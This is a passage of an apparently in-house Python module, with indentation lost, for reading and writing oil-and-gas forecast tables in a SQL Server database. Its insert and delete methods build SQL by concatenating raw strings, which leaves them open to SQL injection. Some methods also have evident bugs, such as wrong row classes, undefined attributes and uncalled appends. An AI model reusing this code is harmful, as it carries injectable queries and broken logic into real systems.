Messages.append('Error updating the Forecast Data table. ' + str(ex))
return Success, Messages
def Delete(self):
Success = True
Messages = []
try:
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[Forecast_Header] where ForecastName = \'' + self.ForecastName + '\' and CorpID = \'' + self.CorpID + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
class ForecastData:
def __init__(self, DBObj, HeaderName=[], CorpID=[], Date_Key = []):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
self.table = 'Forecast_Data'
self.HeaderName = HeaderName
self.CorpID = CorpID
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
self.Date_Key = Date_Key
def ReadTable(self):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
from datetime import datetime
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.HeaderName:
where_dict['HeaderName'] = self.HeaderName
if self.CorpID:
where_dict['CorpID'] = self.CorpID
if self.Date_Key:
if isinstance(self.Date_Key[0], datetime):
self.Date_Key[0] = self.Date_Key[0].strftime('%Y-%m-%d %H:%M:%S')
where_dict['Date_Key'] = self.Date_Key
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
data_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
rows = []
for idx, item in data_df.iterrows():
row = m.ForecastDataRow(item['HeaderName'] , item['CorpID'], item['Date_Key'], item['Gas_Production'], item['Oil_Production'], item['Water_Production'],
item['GasNettingFactor'], item['OilNettingFactor'], item['WaterNettingFactor'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class ForecastDataRow:
def __init__(self, HeaderName, CorpID, Date_Key, Gas_Production, Oil_Production, Water_Production, GasNF, OilNF, WaterNF, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.HeaderName = HeaderName
self.CorpID = CorpID
self.Date_Key = Date_Key
self.Gas_Production = Gas_Production
self.Oil_Production = Oil_Production
self.Water_Production = Water_Production
if GasNF:
self.GasNF = GasNF
else:
self.GasNF = 0
if OilNF:
self.OilNF = OilNF
else:
self.OilNF = 0
if WaterNF:
self.WaterNF = WaterNF
else:
self.WaterNF = 0
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
if isinstance(self.Date_Key, datetime):
self.Date_Key = self.Date_Key.strftime('%Y-%m-%d %H:%M:%S')
if not self.Gas_Production:
self.Gas_Production = 0
if not self.Oil_Production:
self.Oil_Production = 0
if not self.Water_Production:
self.Water_Production = 0
insert_statement = 'insert into [LEForecastDatabase].[dbo].[Forecast_Data] (HeaderName, CorpID, Date_Key, Gas_Production, Oil_Production, Water_Production, '\
'GasNettingFactor, OilNettingFactor, WaterNettingFactor, Update_Date, Update_User)'\
' values (\'' + self.HeaderName + '\', \'' + self.CorpID + '\', convert(datetime, \'' + self.Date_Key + '\', 120) , ' + str(self.Gas_Production) + ',\n'\
'' + str(self.Oil_Production) + ', ' + str(self.Water_Production) + ', ' + str(self.GasNF) + ', ' + str(self.OilNF) + ', ' + str(self.WaterNF) + ', '\
' convert(datetime, \'' + Update_Date + '\', 120), \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error writing to the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for Forecast Header table, Query the table for existing entry
#HeaderName, CorpID, Date_Key
ForecastDataObj = m.ForecastData(self.DBObj, [self.HeaderName], [self.CorpID], [self.Date_Key])
rows, Success, Message = ForecastDataObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Forecast Data table. ' + str(ex))
return Success, Messages
def Delete(self):
Success = True
Messages = []
from datetime import datetime
try:
if isinstance(self.Date_Key, datetime):
self.Date_Key = self.Date_Key.strftime('%Y-%m-%d %H:%M:%S')
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[Forecast_Data] where HeaderName = \'' + self.HeaderName + '\' and CorpID = \'' + self.CorpID + '\' and Date_Key = \'' + self.Date_Key + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
class LEHeader:
def __init__(self, DBObj, WellName=[], CorpID=[], LEName=[], LE_Date = []):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.table = 'LE_Header'
self.WellName = WellName
self.CorpID = CorpID
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
self.LEName = LEName
self.LE_Date = LE_Date
def ReadTable(self):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.WellName:
where_dict['WellName'] = self.WellName
if self.CorpID:
where_dict['CorpID'] = self.CorpID
if self.LEName:
where_dict['LEName'] = self.LEName
if self.LE_Date:
where_dict['LE_Date'] = self.LE_Date
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
header_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
#Convert df to table row objects
rows = []
for idx, item in header_df.iterrows():
row = m.LEHeaderRow(item['LEName'], item['WellName'], item['CorpID'], item['ForecastGeneratedFrom'], item['Wedge'], item['LE_Date'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class LEHeaderRow:
def __init__(self, LEName, WellName, CorpID, ForecastGeneratedFrom, Wedge, LE_Date, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.LEName = LEName
self.CorpID = CorpID
self.ForecastGeneratedFrom = ForecastGeneratedFrom
self.WellName = WellName
self.Wedge = Wedge
self.LE_Date = LE_Date
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
if isinstance(self.LE_Date, datetime):
self.LE_Date = self.LE_Date.strftime('%Y-%m-%d %H:%M:%S')
insert_statement = 'insert into [LEForecastDatabase].[dbo].[LE_Header] (LEName, WellName, CorpID, ForecastGeneratedFrom, Wedge, LE_Date, Update_User, Update_Date) \n'\
'values (\'' + self.LEName + '\', \'' + self.WellName + '\', \'' + self.CorpID + '\', \'' + self.ForecastGeneratedFrom + '\', \'' + self.Wedge + '\', convert(datetime, \'' + self.LE_Date + '\', 120), \'' + Update_User + '\', convert(datetime,\'' + Update_Date + '\', 120))'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for LE Header table, Query the table for existing entry
LEHeaderObj = m.LEHeader(self.DBObj, [self.WellName], [self.CorpID], [self.LEName], [self.LE_Date])
rows, Success, Message = LEHeaderObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Forecast Data table. ' + str(ex))
return Success, Messages
def Delete(self):
Success = True
Messages = []
#To Do - Delete all rows associated with this header as well
try:
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[LE_Header] where LEName = \'' + self.LEName + '\' and CorpID = \'' + self.CorpID + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
class LEData:
def __init__(self, DBObj, HeaderName=[], CorpID=[], Date_Key = []):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
self.table = 'LE_Data'
self.HeaderName = HeaderName
self.CorpID = CorpID
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
self.Date_Key = Date_Key
def ReadTable(self):
from Model import BPXDatabase as bpx
import pandas as pd
from Model import ModelLayer as m
from datetime import datetime
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.HeaderName:
where_dict['HeaderName'] = self.HeaderName
if self.CorpID:
where_dict['CorpID'] = self.CorpID
if self.Date_Key:
if isinstance(self.Date_Key[0], datetime):
self.Date_Key[0] = self.Date_Key[0].strftime('%Y-%m-%d %H:%M:%S')
where_dict['Date_Key'] = self.Date_Key
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
data_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
rows = []
for idx, item in data_df.iterrows():
row = m.LEDataRow(item['HeaderName'] , item['CorpID'], item['Date_Key'], item['Gas_Production'], item['Oil_Production'], item['Water_Production'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class LEDataRow:
def __init__(self, HeaderName, CorpID, Date_Key, Gas_Production, Oil_Production, Water_Production, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.HeaderName = HeaderName
self.CorpID = CorpID
self.Date_Key = Date_Key
self.Gas_Production = Gas_Production
self.Oil_Production = Oil_Production
self.Water_Production = Water_Production
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
if isinstance(self.Date_Key, datetime):
self.Date_Key = self.Date_Key.strftime('%Y-%m-%d %H:%M:%S')
if not self.Gas_Production:
self.Gas_Production = 0
if not self.Oil_Production:
self.Oil_Production = 0
if not self.Water_Production:
self.Water_Production = 0
insert_statement = 'insert into [LEForecastDatabase].[dbo].[LE_Data] (HeaderName, CorpID, Date_Key, Gas_Production, Oil_Production, Water_Production, Update_Date, Update_User)'\
' values (\'' + self.HeaderName + '\', \'' + self.CorpID + '\', convert(datetime, \'' + self.Date_Key + '\', 120) , ' + str(self.Gas_Production) + ',\n'\
'' + str(self.Oil_Production) + ', ' + str(self.Water_Production) + ', convert(datetime, \'' + Update_Date + '\', 120), \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error writing to the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for LE Data table, Query the table for existing entry
LEDataObj = m.LEData(self.DBObj, [self.HeaderName], [self.CorpID], [self.Date_Key])
rows, Success, Message = LEDataObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the LE Data table. ' + str(ex))
return Success, Messages
def Delete(self):
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(self.Date_Key, datetime):
self.Date_Key = self.Date_Key.strftime('%Y-%m-%d %H:%M:%S')
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[LE_Data] where HeaderName = \'' + self.HeaderName + '\' and CorpID = \'' + self.CorpID + '\' and Date_Key = \'' + self.Date_Key + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
class GasNetting:
def __init__(self, DBObj, WellName=[], CorpID=[], NettingDate = []):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
self.table = 'GasNettingValues'
self.WellName = WellName
self.NettingDate = NettingDate
self.CorpID = CorpID
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def ReadTable(self):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.WellName:
where_dict['WellName'] = self.WellName
if self.CorpID:
where_dict['CorpID'] = self.CorpID
if self.NettingDate:
where_dict['NettingDate'] = self.NettingDate
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
data_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
rows = []
for idx, item in data_df.iterrows():
row = m.GasNettingRow(item['WellName'] , item['CorpID'], item['NettingValue'], item['NettingDate'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class GasNettingRow:
def __init__(self, WellName, CorpID, NettingValue, NettingDate, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.WellName = WellName
self.CorpID = CorpID
self.NettingValue = NettingValue
self.NettingDate = NettingDate
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
if isinstance(self.NettingDate, datetime):
self.NettingDate = self.NettingDate.strftime('%Y-%m-%d %H:%M:%S')
insert_statement = 'insert into [LEForecastDatabase].[dbo].[GasNettingValues] (WellName, CorpID, NettingValue, NettingDate, Update_Date, Update_User) values \n'\
'(\'' + self.WellName + '\', \'' + self.CorpID + '\', \'' + str(self.NettingValue) + '\', \'' + self.NettingDate + '\', \'' + Update_Date + '\', \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error witing to the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for Netting Values table, Query the table for existing entry
NettingObj = m.GasNetting(self.DBObj, [self.WellName], [self.CorpID], [self.NettingDate])
rows, Success, Message = NettingObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Netting Data table. ' + str(ex))
return Success, Messages
def Delete(self):
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(self.NettingDate, datetime):
self.NettingDate = self.NettingDate.strftime('%Y-%m-%d %H:%M:%S')
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[GasNettingValues] where WellName = \'' + self.WellName + '\' and CorpID = \'' + self.CorpID + '\' and NettingDate = \'' + self.NettingDate + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
class OilNetting:
def __init__(self, DBObj, WellName=[], CorpID=[], NettingDate = []):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
self.table = 'OilNettingValues'
self.WellName = WellName
self.CorpID = CorpID
self.NettingDate = NettingDate
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def ReadTable(self):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.WellName:
where_dict['WellName'] = self.WellName
if self.CorpID:
where_dict['CorpID'] = self.CorpID
if self.NettingDate:
where_dict['NettingDate'] = self.NettingDate
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
data_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
rows = []
for idx, item in data_df.iterrows():
row = m.GasNettingRow(item['WellName'] , item['CorpID'], item['NettingValue'], item['NettingDate'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class OilNettingRow:
def __init__(self, WellName, CorpID, NettingValue, NettingDate, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.WellName = WellName
self.CorpID = CorpID
self.NettingValue = NettingValue
self.NettingDate = NettingDate
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
if isinstance(self.NettingDate, datetime):
self.NettingDate = self.NettingDate.strftime('%Y-%m-%d %H:%M:%S')
insert_statement = 'insert into [LEForecastDatabase].[dbo].[OilNettingValues] (WellName, CorpID, NettingValue, NettingDate, Update_Date, Update_User) values \n'\
'(\'' + self.WellName + '\', \'' + self.CorpID + '\', \'' + str(self.NettingValue) + '\', \'' + self.NettingDate + '\', \'' + Update_Date + '\', \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error witing to the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for Netting Values table, Query the table for existing entry
NettingObj = m.OilNetting(self.DBObj, [self.WellName], [self.CorpID], [self.NettingDate])
rows, Success, Message = NettingObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Netting Data table. ' + str(ex))
return Success, Messages
def Delete(self):
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(self.NettingDate, datetime):
self.NettingDate = self.NettingDate.strftime('%Y-%m-%d %H:%M:%S')
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[OilNettingValues] where WellName = \'' + self.WellName + '\' and CorpID = \'' + self.CorpID + '\' and NettingDate = \'' + self.NettingDate + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
class LESummary:
def __init__(self, DBObj, SummaryName=[], Wedge=[], LEName = [], GFOForecastName = []):
from Model import BPXDatabase as bpx
import pandas as pd
from Model import ModelLayer as m
self.table = 'LE_Summary'
self.SummaryName = SummaryName
self.Wedge = Wedge
self.LEName = LEName
self.GFOForecastName = GFOForecastName
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def ReadTable(self):
from Model import BPXDatabase as bpx
import pandas as pd
from Model import ModelLayer as m
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.SummaryName:
where_dict['SummaryName'] = self.SummaryName
if self.LEName:
where_dict['LEName'] = self.LEName
if self.Wedge:
where_dict['Wedge'] = self.Wedge
if self.GFOForecastName:
where_dict['GFOForecastName'] = self.GFOForecastName
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
data_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
rows = []
for idx, item in data_df.iterrows():
row = m.LESummaryRow(item['SummaryName'], item['Wedge'], item['Midstream'], item['Reason'], item['Comments'], item['SummaryDate'], item['LEName'], item['GFOForecastName'], item['MonthlyAvgMBOED'], item['QuarterlyAvgMBOED'],
item['AnnualAvgMBOED'], item['MonthlyGFOMBOED'], item['QuarterlyGFOMBOED'], item['AnnualGFOMBOED'], item['MonthlyVariance'], item['QuarterlyVariance'], item['AnnualVariance'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class LESummaryRow:
def __init__(self, SummaryName, Wedge, Midstream, Reason, Comments, SummaryDate, LEName, GFOForecastName, MonthlyAvgMBOED, QuarterlyAvgMBOED,
AnnualAvgMBOED, MonthlyGFOMBOED, QuarterlyGFOMBOED, AnnualGFOMBOED, MonthlyVariance, QuarterlyVariance, AnnualVariance, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.SummaryName = SummaryName
self.Wedge = Wedge
self.Midstream = Midstream
self.Reason = Reason
self.Comments = Comments
self.SummaryDate = SummaryDate
self.LEName= LEName
self.GFOForecastName = GFOForecastName
self.MonthlyAvgMBOED = MonthlyAvgMBOED
self.QuarterlyAvgMBOED = QuarterlyAvgMBOED
self.AnnualAvgMBOED = AnnualAvgMBOED
self.MonthlyGFOMBOED = MonthlyGFOMBOED
self.QuarterlyGFOMBOED = QuarterlyGFOMBOED
self.AnnualGFOMBOED = AnnualGFOMBOED
self.MonthlyVariance = MonthlyVariance
self.QuarterlyVariance = QuarterlyVariance
self.AnnualVariance = AnnualVariance
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
if isinstance(self.SummaryDate, datetime):
self.SummaryDate = self.SummaryDate.strftime('%Y-%m-%d %H:%M:%S')
insert_statement = 'insert into [LEForecastDatabase].[dbo].[LE_Summary] (SummaryName, Wedge, Midstream, Reason, Comments, SummaryDate, \n'\
' LEName, GFOForecastName, MonthlyAvgMBOED, QuarterlyAvgMBOED, AnnualAvgMBOED, MonthlyGFOMBOED, QuarterlyGFOMBOED, AnnualGFOMBOED, \n'\
' MonthlyVariance, QuarterlyVariance, AnnualVariance, Update_Date, Update_User ) values \n'\
'(\'' + self.SummaryName + '\', \'' + self.Wedge + '\', \'' + self.Midstream + '\', \'' + self.Reason + '\', \'' + self.Comments + '\', \'' + self.SummaryDate + '\',\n'\
' \'' + self.LEName + '\', \'' + self.GFOForecastName + '\', \n'\
'\'' + str(self.MonthlyAvgMBOED) + '\', \'' + str(self.QuarterlyAvgMBOED) + '\', \'' + str(self.AnnualAvgMBOED) + '\', '\
'\'' + str(self.MonthlyGFOMBOED) + '\', \'' + str(self.QuarterlyGFOMBOED) + '\', \'' + str(self.AnnualGFOMBOED) + '\', \'' + str(self.MonthlyVariance) + '\', '\
'\'' + str(self.QuarterlyVariance) + '\', \''+ str(self.AnnualVariance) + '\', \'' + Update_Date + '\', \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error writing to the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for LE table, Query the table for existing entry
LESummaryObj = m.LESummary( self.DBObj, [self.SummaryDate], [self.WellName], [self.CorpID], [self.Area])
rows, Success, Message = LESummaryObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Summary table. ' + str(ex))
return Success, Messages
def Delete(self):
Success = True
Messages = []
try:
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[LE_Summary] where SummaryName = \'' + self.SummaryName + '\' and CorpID = \'' + self.CorpID + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
class FracHitMultipliers:
def __init__(self, DBObj, LEName=[], CorpID=[], Date_Key = []):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
self.table = 'Frac_Hit_Multipliers'
self.LEName = LEName
self.CorpID = CorpID
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
self.Date_Key = Date_Key
def ReadTable(self):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.LEName:
where_dict['LEName'] = self.LEName
if self.CorpID:
where_dict['CorpID'] = self.CorpID
if self.Date_Key:
where_dict['Date_Key'] = self.Date_Key
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
data_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
rows = []
for idx, item in data_df.iterrows():
row = m.FracHitMultipliersRow(item['LEName'] , item['CorpID'], item['Date_Key'], item['Multiplier'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class FracHitMultipliersRow:
def __init__(self, LEName, CorpID, Date_Key, Multiplier, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.LEName = LEName
self.CorpID = CorpID
self.Date_Key = Date_Key
self.Multiplier = Multiplier
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
if isinstance(self.Date_Key, datetime):
self.Date_Key = self.Date_Key.strftime('%Y-%m-%d %H:%M:%S')
if not isinstance(self.Multiplier, str):
self.Multiplier = str(self.Multiplier)
insert_statement = 'insert into [LEForecastDatabase].[dbo].[Frac_Hit_Multipliers] (LEName, CorpID, Date_Key, Multiplier, Update_Date, Update_User ) values \n'\
'(\'' + self.LEName + '\', \'' + self.CorpID + '\', \'' + self.Date_Key + '\', \'' + self.Multiplier + '\', \'' + Update_Date + '\', \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for Multipliers table, Query the table for existing entry
